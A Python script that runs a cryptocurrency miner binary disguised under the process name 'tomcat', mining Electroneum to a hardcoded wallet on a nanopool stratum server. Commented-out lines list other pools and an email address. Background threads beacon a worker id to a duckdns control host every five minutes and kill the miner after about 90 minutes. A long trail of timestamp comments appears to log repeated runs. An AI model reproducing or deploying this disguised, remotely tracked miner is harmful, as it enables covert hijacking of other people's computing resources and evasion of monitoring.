import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:57:06.925178
#2018-02-17 16:46:01.426793
#2018-02-17 18:37:04.965003
#2018-02-17 20:24:06.502878
#2018-02-17 22:11:06.056094
#2018-02-17 23:55:08.103069
#2018-02-18 01:46:06.171469
#2018-02-18 03:32:07.285894
#2018-02-18 05:19:01.920460
#2018-02-18 07:12:06.054855
#2018-02-18 09:00:09.979960
#2018-02-18 10:47:05.247340
#2018-02-18 12:31:03.358245
#2018-02-18 14:18:07.381975
#2018-02-18 16:09:05.546029
#2018-02-18 17:58:07.209431
#2018-02-18 19:45:01.678594
#2018-02-18 21:29:01.656902
#2018-02-18 23:18:01.580143
#2018-02-19 01:06:06.185025
#2018-02-19 02:52:04.813130
#2018-02-19 04:39:05.981904
#2018-02-19 06:23:08.286324
#2018-02-19 08:12:07.778896
#2018-02-19 10:02:04.886561
#2018-02-19 11:52:06.984843
#2018-02-19 13:38:01.655201
#2018-02-19 15:25:11.002158
#2018-02-19 17:13:06.746374
#2018-02-19 19:01:06.372074
#2018-02-19 20:46:03.363748
#2018-02-19 22:34:06.654749
#2018-02-20 00:19:04.470707
#2018-02-20 02:07:05.409124
#2018-02-20 03:58:05.929735
#2018-02-20 05:41:07.147770
#2018-02-20 07:27:05.756845
#2018-02-20 09:12:01.571971
#2018-02-20 10:54:07.392658
#2018-02-20 12:43:02.091123
#2018-02-20 14:29:06.865034
#2018-02-20 16:13:07.166339
#2018-02-20 17:58:07.612259
#2018-02-20 19:48:10.922504
#2018-02-20 21:38:05.585026
#2018-02-20 23:20:09.799425
#2018-02-21 01:06:04.384734
#2018-02-21 02:54:01.897780
#2018-02-21 04:41:04.397118
#2018-02-21 06:29:04.151025
#2018-02-21 08:14:05.726659
#2018-02-21 10:01:04.256969
#2018-02-21 11:50:02.032965
#2018-02-21 13:43:01.224989
#2018-02-21 15:29:01.747175
#2018-02-21 17:20:09.342489
#2018-02-21 19:07:04.843767
#2018-02-21 20:55:08.703099
#2018-02-21 22:43:06.737093
#2018-02-22 00:31:05.149507
#2018-02-22 02:18:05.663525
#2018-02-22 04:03:04.019060
#2018-02-22 05:49:02.035152
#2018-02-22 07:36:05.741030
#2018-02-22 09:25:08.051807
#2018-02-22 11:11:03.659444
#2018-02-22 12:56:01.658162
#2018-02-22 14:44:03.676932
#2018-02-22 16:29:07.850240
#2018-02-22 18:15:11.700473
#2018-02-22 20:04:05.132934
#2018-02-22 21:53:06.595357
#2018-02-22 23:40:05.007610
#2018-02-23 01:27:06.277001
#2018-02-23 03:14:01.892638
#2018-02-23 05:01:07.855868
#2018-02-23 06:47:05.620455
#2018-02-23 08:41:05.722829
#2018-02-23 10:56:07.089471
#2018-02-23 12:52:11.284652
#2018-02-23 14:36:04.915653
#2018-02-23 16:26:04.516026
#2018-02-23 18:12:08.719417
#2018-02-23 19:57:07.227707
#2018-02-23 21:40:07.775657
#2018-02-23 23:28:07.534759
#2018-02-24 01:20:07.896230
#2018-02-24 03:11:06.726485
#2018-02-24 04:56:08.042923
#2018-02-24 06:43:07.229277
#2018-02-24 08:34:03.773213
#2018-02-24 10:20:08.275734
#2018-02-24 12:15:01.887199
#2018-02-24 14:03:07.394723
#2018-02-24 15:52:01.233906
#2018-02-24 17:46:03.250102
#2018-02-24 19:33:06.562028
#2018-02-24 21:21:04.155656
#2018-02-25 01:11:01.320685
#2018-02-25 04:55:03.929689
#2018-02-25 09:17:01.822485